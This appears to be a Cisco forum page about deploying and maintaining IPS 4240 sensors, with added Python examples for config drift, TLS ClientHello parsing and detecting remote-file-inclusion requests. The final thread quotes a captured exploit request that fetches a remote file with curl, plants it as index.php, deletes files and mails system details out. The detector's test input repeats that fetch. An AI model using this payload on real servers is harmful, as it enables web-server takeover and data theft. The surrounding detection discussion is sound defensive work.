Deployment of Cisco IPS 4240 devices
I can't find much information about mass deployment of the Cisco IPS 4240. I have 6 devices that I intend to drive out to several remote sites and tie in to a centralized Cisco MARS unit. Without the help of any CSM/LMS software, is there a quick and dirty way to pull this off? I'm thinking of setting up a single IPS appliance, then pulling and distributing its configuration file to the remaining devices. I would like to hear how others have done this...
If all of your sensors are the same type (all 4240s in your situation) and will all run the exact same configuration, then the copy command will help you out.
There is a new feature added to the copy command in IPS 6.1 which will help you copy the config of one sensor to another.
Fully configure one sensor (using IME, IDM or CLI). When you are satisfied with the configuration, use the copy command to copy it TO an SCP server.
Now bring up a second sensor and configure basic networking through setup (ip address, gateway, etc.).
Now use the copy command to copy the first sensor's configuration from the SCP server into the running configuration of the second sensor.
It will ask you whether to change the network settings on the second sensor.
Answer no.
The rest of the configuration copied from the first sensor will be placed in the second sensor.
The second sensor will keep its own unique IP address but gain the rest of the configuration from the first sensor's config.
Continue to do this with additional sensors.
The process can then be repeated every time additional changes are made to the first sensor.
Remember, though, that this only works if the sensor configuration is to be exactly duplicated (including which interfaces are monitored and how).
If each sensor will have some unique tunings, then you need to manage each sensor on its own, or buy CSM, which can be used to share only parts of the configuration across multiple sensors.
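The answer's caveat is that the copy procedure overwrites everything except the network settings you keep by answering "no", so it is only safe when the sensors really are clones. The script below is an added example (not code from this thread or from Cisco) that checks exactly that before you push a reference config: it ignores the per-sensor host-ip and host-name lines and diffs the rest. The configuration text is a constructed, simplified approximation of the IPS CLI format (service blocks, one key/value per line, closed by exit); the sample dumps are not real sensor output.

```python
"""Config-drift check for sensors that are meant to be clones.

Added example, not code from the thread or from Cisco. It assumes a
simplified, constructed text format resembling the IPS CLI configuration
('service <name>' blocks, one 'key value' per line, closed by 'exit').
The sensor-specific keys are the ones the copy command offers to keep when
you answer 'no' to changing network settings: host-ip and host-name.
"""
import difflib

# Per-sensor keys that are expected to differ between clones (assumption).
NETWORK_KEYS = frozenset({"host-ip", "host-name"})

# Constructed sample dump, not output from a real sensor.
REFERENCE = """\
service host
network-settings
host-ip 10.0.1.11/24,10.0.1.1
host-name ips-site-a
access-list 10.0.0.0/8
exit
exit
service interface
inline-interfaces pair0
interface1 GigabitEthernet0/0
interface2 GigabitEthernet0/1
exit
exit
service signature-definition sig0
signatures 2004 0
status
enabled true
exit
exit
exit
"""

# Same as REFERENCE apart from the network settings: safe to clone.
CLONE = (REFERENCE
         .replace("10.0.1.11/24,10.0.1.1", "10.0.2.11/24,10.0.2.1")
         .replace("ips-site-a", "ips-site-b"))

# A sensor whose operator has also disabled signature 2004: a local tuning
# that the copy procedure would silently overwrite.
DRIFTED = CLONE.replace("enabled true", "enabled false")


def strip_network_settings(config: str) -> list:
    """Return the config lines minus blanks and the per-sensor network keys."""
    kept = []
    for line in config.splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        if stripped.split(None, 1)[0] in NETWORK_KEYS:
            continue
        kept.append(stripped)
    return kept


def config_drift(reference: str, candidate: str) -> list:
    """Lines that differ once network settings are ignored ('-' = reference only,
    '+' = candidate only). An empty list means the candidate can be overwritten
    by the reference config without losing a local tuning."""
    diff = difflib.unified_diff(
        strip_network_settings(reference),
        strip_network_settings(candidate),
        fromfile="reference", tofile="candidate", lineterm="", n=0)
    return [line for line in diff
            if not line.startswith(("---", "+++", "@@"))]


def clone_safe(reference: str, candidate: str) -> bool:
    """True when the two configs are identical apart from network settings."""
    return not config_drift(reference, candidate)


if __name__ == "__main__":
    for name, cfg in (("CLONE", CLONE), ("DRIFTED", DRIFTED)):
        drift = config_drift(REFERENCE, cfg)
        print(f"{name}: {'clone-safe' if not drift else 'local tunings present'}")
        for line in drift:
            print("   ", line)
```

Run it against the reference config and each sensor's current config (exported the same way you exported the reference) before the copy step; any line it prints is a tuning that would be lost, which is the case the answer says needs per-sensor management or CSM.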
Tags: Cisco Security
Similar Questions
-
TLS not fully supported in Cisco IPS 4240
I am trying to connect to a Cisco IPS 4240 device while having FIPS security settings enabled on the client using SSL. This is not possible because the device does not support TLS extensions in the Client Hello packet (RFC 5746) sent by the client when using TLS (SSL3 and lower are not FIPS compliant). The IDM application that communicates with the device does not send these extensions (I'm seeing this with Wireshark) and is able to connect to it.
Is it possible to make the 4240 support these TLS extensions?
This is related to the bugs below. The initial fix will be included in the 7.1.5 release, which is planned to support the 4240 platform among others. This will allow the IPS web server to ignore the extensions in the short term. The long-term solution will require an update to the web server so that it is fully compliant with RFC 5746.
Todd
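What the question describes (a FIPS-configured client adds extensions to its Client Hello, and a web server that only understands the pre-extension layout cannot cope) is easiest to see at the byte level. The following is an added example, not code from this thread or from Cisco: it builds two constructed Client Hello records offline, one without extensions and one carrying SNI plus the RFC 5746 renegotiation_info extension, and parses them back, reporting how many bytes are left over after the compression-methods field, which is where an extension-unaware parser stops. Extension type 0xff01 and cipher suite value 0x00ff are the RFC 5746 signals; the hostname and cipher suites are arbitrary.

```python
"""Minimal TLS ClientHello builder/parser to see why an extension-unaware
server fails on a FIPS client.

Added example, not code from the thread or from Cisco. The hello bytes are
constructed here; no network connection is made. Extension type 0xff01 and
cipher suite 0x00ff are the RFC 5746 renegotiation_info signals; 0x0000 is
server_name (SNI). Everything else is plain RFC 5246 record layout.
"""
import struct
from typing import List, Optional, Tuple

RENEG_INFO_EXT = 0xFF01   # RFC 5746 renegotiation_info extension
RENEG_SCSV = 0x00FF       # RFC 5746 TLS_EMPTY_RENEGOTIATION_INFO_SCSV
SNI_EXT = 0x0000
TLS10 = 0x0301


def build_client_hello(version: int, cipher_suites: List[int],
                       extensions: Optional[List[Tuple[int, bytes]]] = None) -> bytes:
    """Serialise a ClientHello inside a handshake record (zero random, no session)."""
    body = struct.pack("!H", version) + bytes(32)      # client_version, random
    body += b"\x00"                                     # empty session_id
    suites = b"".join(struct.pack("!H", s) for s in cipher_suites)
    body += struct.pack("!H", len(suites)) + suites
    body += b"\x01\x00"                                 # one compression method: null
    if extensions is not None:                          # extensions block is optional
        blob = b"".join(struct.pack("!HH", t, len(d)) + d for t, d in extensions)
        body += struct.pack("!H", len(blob)) + blob
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16" + struct.pack("!HH", version, len(handshake)) + handshake


def parse_client_hello(record: bytes) -> dict:
    """Parse a ClientHello and report what a legacy server sees after the
    last field it knows about (compression methods)."""
    if record[0] != 0x16:
        raise ValueError("not a handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    hs = record[5:5 + rec_len]
    if hs[0] != 0x01:
        raise ValueError("not a ClientHello")
    body = hs[4:4 + int.from_bytes(hs[1:4], "big")]
    pos = 0
    version = struct.unpack("!H", body[pos:pos + 2])[0]
    pos += 2 + 32                                      # version + random
    pos += 1 + body[pos]                               # session_id
    cs_len = struct.unpack("!H", body[pos:pos + 2])[0]
    pos += 2
    suites = [struct.unpack("!H", body[i:i + 2])[0] for i in range(pos, pos + cs_len, 2)]
    pos += cs_len
    pos += 1 + body[pos]                               # compression methods
    # Bytes an extension-unaware parser cannot interpret (0 for a legacy hello).
    legacy_leftover = len(body) - pos
    ext_types = []
    if pos < len(body):   # RFC 5246 7.4.1.2: extensions are present iff bytes remain
        end = pos + 2 + struct.unpack("!H", body[pos:pos + 2])[0]
        pos += 2
        while pos < end:
            etype, elen = struct.unpack("!HH", body[pos:pos + 4])
            pos += 4 + elen
            ext_types.append(etype)
    return {
        "version": version,
        "cipher_suites": suites,
        "extensions": ext_types,
        "secure_renegotiation_signalled": RENEG_INFO_EXT in ext_types or RENEG_SCSV in suites,
        "bytes_after_compression": legacy_leftover,
    }


def sni(hostname: str) -> bytes:
    """server_name extension payload with a single host_name entry."""
    name = hostname.encode()
    entry = b"\x00" + struct.pack("!H", len(name)) + name   # name_type 0 = host_name
    return struct.pack("!H", len(entry)) + entry


# Constructed hellos: a legacy client without extensions and a FIPS-style
# client sending SNI plus the RFC 5746 extension.
LEGACY_HELLO = build_client_hello(TLS10, [0x002F, 0x0035])
MODERN_HELLO = build_client_hello(
    TLS10, [0x002F, 0x0035],
    [(SNI_EXT, sni("sensor.example")), (RENEG_INFO_EXT, b"\x00")])

if __name__ == "__main__":
    for label, hello in (("legacy", LEGACY_HELLO), ("modern", MODERN_HELLO)):
        print(label, parse_client_hello(hello))
```

A server that ignores the trailing bytes (the short-term fix the answer describes) still completes the handshake; a server that treats them as a malformed message rejects every client whose policy, such as a FIPS profile, requires the RFC 5746 signal. Pointing the parser at a Client Hello captured with Wireshark from the affected client is a quick way to confirm which extensions it is sending.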
-
SSL Session Key Recovery v1 in Cisco IPS
Hi all,
In a network audit, I have the comment below mentioned by the auditor for a Cisco IPS 4270 device, but I don't have any solution for it. Kindly help me out on this.
SSL Session Key Recovery v1
The remote SSH daemon supports connections made
using version 1.33 or 1.5 of the SSH
protocol. These protocols are not completely
cryptographically safe so they should not be used.
With regards,
Sashi
Currently there is no way to allow only SSH version 2 and disable SSH version 1 on the IPS.
Here is the enhancement request which has been filed, for your reference: CSCsk84977
Hope that answers your question.
-
IPS 4240 high availability?
Hello,
Can the 4240 run in HA mode?
Or should I look at the 4255 if I need to work in HA mode?
Kindly help me with this info... Thanks in advance.
Kind regards
RAM
Just to add a little bit to Bob's response. HA is possible, but as mentioned above, it is not HA as you would expect from a firewall; it requires significant network planning and is rather technical in nature.
The best documentation I could find about the HA designs is in chapter 21, "Deploying Cisco IPS for High Availability and High Performance", of the CCNP Security IPS 642-627 Official Cert Guide, ISBN: 9780132372107. It gets quite detailed and explains a large number of different methods.
I was also able to find some information on this site, but it is at a higher level and does not provide as many options.
https://www.NetworkWorld.com/community/node/18384
I had to work out HA in some of our environments, and I'm here to tell you: plan ahead, far in advance, and test several methods to find one that suits. We were using a method that I just couldn't find mentioned anywhere.
-
Cisco IPS automatic signature update link?
Hi all,
I would like to know what address or link we need for the IPS-4240 to automatically update signatures from Cisco. In our setup the IPS shows this link. Is this correct?
username sabirins1978
cisco-url https://198.133.219.25//cgi-bin/front.x/ida/locator/locator.pl
Thank you.
Kind regards
Budy
Yes, the following should work:
https://www.Cisco.com/cgi-bin/front.x/IDA/Locator/Locator.pl
Regards
Farrukh
-
Cisco IPS 4200 Signature Update
We are currently evaluating and implementing the Cisco IPS solution for our security needs.
Our supplier has said that 'online' signature updates are not possible with Cisco IPS: this is a manual process and we need to load the files onto the device ourselves if we want to update them.
Somehow, this defies logic. Surely, I think, any IPS should have the possibility of obtaining updated signatures online.
I apologize if the question is too basic in nature, but could someone shed more light on this?
Thank you.
You have auto update functionality from Cisco IPS version 6.0; take a look at the attached picture.
After a signature update it is *recommended* that you reload the signatures (restart the sensor), although this is not mandatory.
Our IPS has not been restarted for over two months now and everything is working ok.
[Attached picture: Automatic update]
-
I have two IPS 4240s that can be placed between our internal network and our extranet firewall. The firewall is a standard active/standby ASA 5520 pair connected to two switches.
Q1 - If I'm not worried about atomic attacks, is there another advantage of inline over promiscuous?
Q2 - Whether inline or promiscuous, is it necessary to connect a single IPS to both switches in order to receive packets when an ASA failover occurs? If so, physically or through RSPAN?
Q3 - If the IPS fails while set inline, do the interfaces fail open (traffic continues to pass) or closed (traffic is dropped)? I couldn't find that on the Cisco site.
Thank you!
In promiscuous mode you can use one 4240 and SPAN the output of each switch to two sensing interfaces on the 4240 (it has four available). A single 4240 should even be able to track TCP sessions that span both paths, as in the case of a failover.
-
IPS-4240 engine upgrade procedure from E3 to E4
Hi all,
Can someone help me upgrade the IPS 6.0(1) 7.0 E1(2) E4?
Which images need to be upgraded for this?
What is the appropriate upgrade procedure?
Here is the show version output for your reference...
========================================
Cisco-IPS# sh ver
Application Partition:
Cisco Intrusion Prevention System, Version 1.0000 E3
Host:
  Realm Keys          key1.0
Signature Definition:
  Signature Update    S479.0   2010-03-19
  Virus Update        V1.4     2007-03-02
OS Version:           2.4.30-IDS-smp-bigphys
Platform:             IPS-4240-K9
Serial Number:        JMX1244L0PK
Licensed, expires:    December 31, 2010 UTC
Sensor up-time is 211 days.
Using 1439252480 out of 1984552960 bytes of available memory (72% usage)
application-data is using 44.0M out of 166.8M bytes of available disk space (28% usage)
boot is using 39.7M out of 68.6M bytes of available disk space (61% usage)

MainApp          E-2008_OCT_16_16_24   (Release)   2008-10-16T16:40:57-0500   Running
AnalysisEngine   E-2008_OCT_16_16_24   (Release)   2008-10-16T16:40:57-0500   Running
CLI              E-2008_OCT_16_16_24   (Release)   2008-10-16T16:40:57-0500

Upgrade History:
* IPS-sig-S465-req-E3       23:00:43 UTC Thursday, January 28, 2010
  IPS-sig-S479-req-E3.pkg   00:05:37 UTC Wednesday, April 7, 2010

Recovery Partition Version 1.1 - 1.0000 E3

Host Certificate Valid from: November 17, 2008 to November 18, 2010

Cisco-IPS#
=================================
Kind regards
Anuj Pratap
No, do not reimage the system (IPS-4240-K9-sys-1.1-a-7.0-2-E4.img); that would wipe all of your configuration.
Just perform the upgrade using this upgrade file: IPS-K9-7.0-2-E4.pkg, which will automatically bring the sensor to 7.0(2) E4.
-
Hi all,
I have one IPS-4240 unit. I want to know, if my sensor or the unit itself fails / stops, whether there is an option where my traffic will still be passed so that there is no downtime.
Thank you
Pratik
When the sensor is inline you can configure inline bypass mode 'auto', so that when the sensor software is not working it will just pass traffic through without inspection. However, if the sensor is completely shut down, then no, the traffic will be dropped when in inline mode.
Here is more information on inline bypass mode:
However, if it is in promiscuous mode, you don't have to worry about this, because the device is not "inline" and will cause no disruption.
Hope that helps.
-
100% CPU usage on Cisco IPS 4270...
Hi people, I have a Cisco IPS 4270 version 7.0(2) E3. When I try to access it through IDM it shows cpu1 = 100% and cpu4 = 100%, but cpu1 and cpu2 vary. Can you please tell me what the solution to this problem will be...
When I try to go to the configuration it gives me an error... document attached, please check...
Hello,
Having 100% on some of your CPUs is normal on the IPS platform.
The device uses idle cycles to prepare for handling incoming packets and to reduce the delay it introduces on their path, so this is expected even under low load.
If you want a better idea of what percentage of your IPS capacity you are currently using, you should look at the inspection load value. Looking at the data you provided, you are at about 25% at present.
As for the rdep timeout message, it seems to be a software problem. Looking more closely at the image you attached, you can also see "analysis engine status: no response".
It is somewhat difficult to troubleshoot those on CSC, so I suggest pursuing it with TAC if you want to know the exact root cause.
What I advise is to upgrade to the latest 7.0 code, which I believe is 7.0(5a) E4, since it is more than likely fixed in that version.
If you are looking for a quick fix, a reboot of the IPS should clear this, but the problem will more than likely return later.
Kind regards
Nicolas
-
Two IPS devices with the same UUID
I have two Sourcefire\Cisco IPS sensors deployed which have been identified as having the same UUID. As you can imagine, this is causing all sorts of issues. Has this ever been seen before, and if so, is there a solution?
-------------------[ SENSOR 1 ]--------------------
Model: 3D7120 (63) Version 5.4.0.4 (Build 55)
UUID: 46ffa0d8-4907-11e4-8669-d32acdb6a95e
VDB Version: 258
----------------------------------------------------
-------------------[ SENSOR 2 ]--------------------
Model: 3D7120 (63) Version 5.4.0.4 (Build 55)
UUID: 46ffa0d8-4907-11e4-8669-d32acdb6a95e
VDB Version: 258
----------------------------------------------------
I've not seen this before.
I guess you have to remove the two sensors, reinstall their software and add them back to the Management Center.
-
Upgrading the Cisco IPS signature version
Hi guys:
Does anyone know the process for updating the signature version on a Cisco IPS? I want to do it manually. If somebody can tell me the commands and everything I have to do for this.
Regards
Luis;
Manual signature updates for Cisco IPS sensors can be performed from the CLI as shown here:
Or from the IDM interface as shown here:
This process is also used to upgrade the base software of the sensor.
Scott
-
Hello,
Does anyone know when the 4xFE cards for the IPS-4240 (for a total of 8 interfaces) will be available?
Kind regards
Krzysztof
The option card for the IPS-4240/4255 sensors will be a 4GE card supporting copper (RJ45) and fiber (SX) connections. It will allow a total of 8 RJ45 interfaces, or 4 SX fiber interfaces (plus 4 RJ45 interfaces), on these platforms. Unfortunately, it will probably not be available for another 9 months or more.
-
Hi guys,
I need a complete PDF list of Cisco IPS signatures.
Can someone help me find a link or a PDF?
Thank you all,
JV
Hello,
I couldn't find any method to export the list of signatures. This could be because there are thousands of them.
However, you can use the following link to look up signature details.
http://Tools.Cisco.com/Security/Center/home.x
SPSP
-
PHP exploit triggers Cisco Security Agent but NOT the Cisco IPS... why?
Does anyone know which signature this exploit should trigger on the Cisco IPS sensor? Not sure if there is one, or if we turned it off.
We see this exploit hit our Exchange servers several times during the week.
The process of "C:\WINNT\System32\inetsrv\inetinfo.exe" (as user NT AUTHORITY\SYSTEM) received the data ' / index2.php? option = com_content & do_pdf = 1 & id = 1index2.php? _REQUEST [option] = com_content & _REQUEST [Itemid] = 1 & GLOBALS = & mosConfig_absolute_path =http://220.194.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http: / / 220.194.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_66. 224.194.188%[email protected] / * /; uname%20-a%20|%20Mail%20-s%20uname_i2_66.224.194.188%[email protected] / * /. com; echo |'.
I think this could be the Mambo exploit. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for the info. I searched on Mambo in MySDN and found signature 5163 "Mambo Site Server Administration Password ByPass"; here is a snippet of the description: "administrative access is acquired by sending a specific url using the index2.php script and the PHPSESSID variable." This looks like what you pasted. Note "index2.php". Your IPS could not see this, so it was over 443.
Hope this helps
M
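The request quoted in the question has the classic shape of a PHP remote-file-inclusion attempt: a configuration path parameter pointed at an external URL, superglobal overrides (GLOBALS=, _REQUEST[...]) that only matter with register_globals, and a cmd parameter carrying a shell command chain. The following is an added example, not code from this thread or from Cisco: a small detector that percent-decodes a request line and reports those indicators, run over two constructed request lines (TEST-NET address 203.0.113.5 and hypothetical parameter names, mirroring only the shape of the quoted request). It is the kind of check you would run on web server or host-agent logs, which is where this traffic is still visible when it arrives over 443 and the IPS cannot see it.

```python
"""Flag remote-file-inclusion / register_globals abuse in a web request line.

Added example, not code from the thread or from Cisco. The request lines
below are constructed (TEST-NET address 203.0.113.5, hypothetical parameter
names) and only mirror the shape of the request quoted in the question.
"""
import re
from urllib.parse import unquote

REMOTE_URL = re.compile(r"^\s*(https?|ftp)://", re.IGNORECASE)
SHELL_CHAIN = re.compile(r"[;|`]|\b(curl|wget)\b", re.IGNORECASE)
SUPERGLOBALS = ("GLOBALS", "_REQUEST[", "_GET[", "_POST[", "_SERVER[")


def deep_unquote(text: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so double encoding does not hide a payload."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def detect_rfi(request: str) -> list:
    """Return human-readable findings for one request path+query; [] if clean."""
    _, _, query = request.partition("?")
    findings = []
    for pair in query.split("&"):   # split on '&' only; ';' may be part of a payload
        if not pair:
            continue
        raw_key, _, raw_value = pair.partition("=")
        key, value = deep_unquote(raw_key), deep_unquote(raw_value)
        if key.startswith(SUPERGLOBALS):
            findings.append(f"superglobal override via parameter {key!r}")
        if REMOTE_URL.match(value):
            findings.append(f"remote URL in parameter {key!r}")
        if SHELL_CHAIN.search(value):
            findings.append(f"shell command chain in parameter {key!r}")
    return findings


# Constructed request lines: one ordinary page view, one RFI-shaped request.
CONSTRUCTED_REQUESTS = [
    "/index.php?option=com_content&id=12",
    "/index2.php?option=com_content&do_pdf=1&id=1&_REQUEST[option]=com_content"
    "&GLOBALS=&mosConfig_absolute_path=http://203.0.113.5/~x/cm?"
    "&cmd=cd%20cache;curl%20-O%20http://203.0.113.5/~x/cm",
]

if __name__ == "__main__":
    for request in CONSTRUCTED_REQUESTS:
        findings = detect_rfi(request)
        print(request[:60], "->", findings or "clean")
```

The three indicators are independent on purpose: a remote URL in a path-style parameter is enough to flag a request even when the attacker omits the command stage, and the superglobal overrides are worth alerting on by themselves because no legitimate client sends them.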